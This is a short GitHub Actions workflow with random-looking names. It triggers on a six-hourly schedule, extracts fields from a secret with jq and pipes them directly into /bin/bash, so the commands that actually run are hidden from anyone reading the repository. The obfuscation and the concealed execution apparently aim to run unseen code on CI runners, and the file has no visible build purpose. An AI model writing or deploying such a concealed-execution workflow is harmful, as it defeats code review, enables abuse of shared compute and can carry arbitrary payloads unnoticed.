name: zhangdiaoyu4617

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangdiaoyu4617
        env:
          fk2: ${{ secrets.fk2 }}
        run: |
          echo $fk2 | jq -r .qwzv0 | /bin/bash
          echo $g5473 | jq -r .sr9 | /bin/bash
          echo $hcn4644 | jq -r .oluyl2203 | /bin/bash
          echo $voqe22 | jq -r .y8 | /bin/bash
          echo $mui6 | jq -r .aq72332 | /bin/bash

